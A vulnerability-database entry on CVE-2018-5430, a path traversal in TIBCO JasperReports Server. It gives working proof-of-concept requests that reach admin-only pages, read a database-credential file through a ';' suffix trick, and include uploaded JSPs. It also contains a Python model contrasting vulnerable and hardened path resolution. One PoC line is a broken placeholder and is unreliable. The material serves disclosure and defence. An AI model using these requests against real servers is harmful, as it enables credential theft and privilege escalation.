Information disclosure vulnerability in the Spring Web Flow component of multiple TIBCO products

Vulnerability ID: 1125044
Vulnerability type: Path traversal
Published: 2018-05-03
Updated: 2019-10-17
CVE ID: CVE-2018-5430
CNNVD ID: CNNVD-201804-795
Platform: Multiple
CVSS score: 4.0
|Vulnerability Source
https://www.exploit-db.com/exploits/44623
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201804-795
|Vulnerability Details
TIBCO JasperReports Server and the other products listed below are products of the US company TIBCO Software. TIBCO JasperReports Server is the server edition of a report generation and editing tool; TIBCO JasperReports Server Community Edition is its community edition. Spring Web Flow is the flow-control component used by these products. The Spring Web Flow component of multiple TIBCO products contains an information disclosure vulnerability: an authenticated attacker can use it to access content of the web application, including sensitive configuration files, regardless of the attacker's role. The following products and versions are affected: TIBCO JasperReports Server 6.2.4 and earlier, 6.3.0, 6.3.2, 6.3.3, 6.4.0 and 6.4.2; TIBCO JasperReports Server Community Edition 6.4.2 and earlier; TIBCO JasperReports Server for ActiveMatrix BPM 6.4.2 and earlier; TIBCO Jaspersoft for AWS with Multi-Tenancy 6.4.2 and earlier; TIBCO Jaspersoft Reporting and Analytics for AWS 6.4.2 and earlier.
|Vulnerability EXP
TIBCO's JasperReports Server (<=6.2.4, 6.3.0, 6.3.2-3, 6.4.0, 6.4.2; Community Edition, ActiveMatrix BPM edition, Jaspersoft for AWS with Multi-Tenancy and Jaspersoft Reporting and Analytics for AWS <=6.4.2) is vulnerable to authenticated file read and file inclusion by means of directory traversal. Any authenticated user, regardless of role or permissions, can read or include files from the filesystem hosting the application.

CVSS v3 Base Score: 7.7 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

---

## Bypassing JasperReports Access Controls
The following request allowed us to include an administrator-only JSP as a low-privileged user (joeuser):

/jasperserver/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/adminImport

Which took us from:

getAttribute() @ HttpServletRequestParameterMap.java:57
> string[] = wrapper.getParameterValues("page")

To:

getResource() @ DirResourceSet.java:101
> file = new File(/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp")

Because the `page` value is never validated, the traversal sequences pass straight through to the file lookup and the resolved path can be steered to a destination of our choice. Further proofs of concept (PoCs) of the attack follow:

## Accessing Administrator Export Functions

/jasperserver-pro/___________?{param}=..

## Accessing AWS Configuration Functions
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/awsConfiguration

Both requests above loaded administrator-only portions of the application while authenticated as an ordinary user, bypassing the application's access controls.

## Local File Read

The following request allowed us to read configuration files on the server by abusing the unsanitized `page` parameter. The file read here holds database credentials, which an attacker would use to pivot further across applications and services. Although the screenshot referenced here shows a password that was randomly generated for the occasion, we blurred it out of habit.

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../js.jdbc.properties;

## Local File Inclusion (JSP)

In a post-intrusion scenario, an attacker who can upload an arbitrary JSP file masquerading as a regular file (without the .jsp extension) to the victim's filesystem could then execute it via local file inclusion with a request like the following:

/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/file;

NOTE: Since the application appends `.jsp` to the `page` parameter value, a request would normally resolve to ../../../jsp/modules/administer/file.jsp. To read a configuration file instead, we need the appended `.jsp` to be ignored. NULL bytes (%00) do not work, but appending a semicolon to the desired path does: the servlet container treats everything after `;` in a path segment as a path parameter (as it does for `;jsessionid=...`) and discards it before resolving the resource, so `js.jdbc.properties;.jsp` is opened as `js.jdbc.properties`.
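To make the two effects the PoCs depend on concrete, the following added example (not TIBCO's, Spring Web Flow's or the advisory authors' code) models the view-name resolution in Python: `../` in the `page` value walks out of the view directory, and a `;` suffix makes the appended `.jsp` disappear. It also shows the check a fix needs. The view prefix `/WEB-INF/jsp/modules/sampleFlow/` is an assumption (the advisory only shows the resolved path, three directories above the prefix), as is the path-parameter stripping, which mirrors Tomcat's handling of `;jsessionid=`.

```python
"""
Model of the view-name resolution behind CVE-2018-5430 (added example; not
TIBCO's or Spring Web Flow's code).

Assumptions not stated in the advisory:
  * the flow's view prefix is '/WEB-INF/jsp/modules/sampleFlow/';
  * the servlet container strips ';...' path parameters from each path
    segment before resolving the resource, as Tomcat does for ';jsessionid='.
"""
import posixpath

VIEW_PREFIX = "/WEB-INF/jsp/modules/sampleFlow/"  # assumed prefix
VIEW_SUFFIX = ".jsp"                              # appended by the app (advisory note)


def strip_path_params(path: str) -> str:
    """Drop ';...' from every segment, mirroring servlet path-parameter handling."""
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def resolve_view_vulnerable(page: str) -> str:
    """Concatenate prefix + page + suffix and let the container normalise it.

    This is the flawed behaviour: nothing checks where the result ends up.
    """
    raw = VIEW_PREFIX + page + VIEW_SUFFIX
    return posixpath.normpath(strip_path_params(raw))


def resolve_view_hardened(page: str) -> str:
    """Resolve the same way, but refuse anything that leaves the view directory.

    Rejects path parameters and NUL up front, then canonicalises and checks that
    the result still lies under VIEW_PREFIX. The prefix ends in '/', so a
    sibling directory such as 'sampleFlowX/' cannot pass the check.
    """
    if ";" in page or "\x00" in page:
        raise ValueError("illegal character in view name")
    resolved = posixpath.normpath(VIEW_PREFIX + page + VIEW_SUFFIX)
    if not resolved.startswith(VIEW_PREFIX):
        raise ValueError(f"view name escapes the view directory: {page!r}")
    return resolved


# 'page' values taken from the advisory's PoCs, plus a benign one for contrast.
POC_PAGES = {
    "adminImport": "../../../jsp/modules/administer/adminImport",
    "awsConfiguration": "../../../jsp/modules/administer/awsConfiguration",
    "jdbc_properties": "../../../js.jdbc.properties;",
    "benign": "index",
}


def run_all() -> dict:
    """Return {name: (vulnerable_result, hardened_result_or_rejection)} for every PoC."""
    results = {}
    for name, page in POC_PAGES.items():
        vulnerable = resolve_view_vulnerable(page)
        try:
            hardened = resolve_view_hardened(page)
        except ValueError as exc:
            hardened = f"REJECTED: {exc}"
        results[name] = (vulnerable, hardened)
    return results


if __name__ == "__main__":
    for name, (vulnerable, hardened) in run_all().items():
        print(f"{name:16} vulnerable -> {vulnerable}")
        print(f"{'':16} hardened   -> {hardened}")
```

The vulnerable resolver reproduces the path from the advisory's debugger trace for the adminImport PoC and turns `../../../js.jdbc.properties;` into `/WEB-INF/js.jdbc.properties`, while the hardened one rejects all three attack values and still serves the benign view. A canonicalise-then-compare check is the minimum; a fixed allow-list of view names per flow is the stronger fix, since it removes the user-controlled path entirely.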
|References

Source: www.tibco.com
Link: https://www.tibco.com/support/advisories/2018/04/tibco-security-advisory-april-17-2018-tibco-jasperreports-2018-5430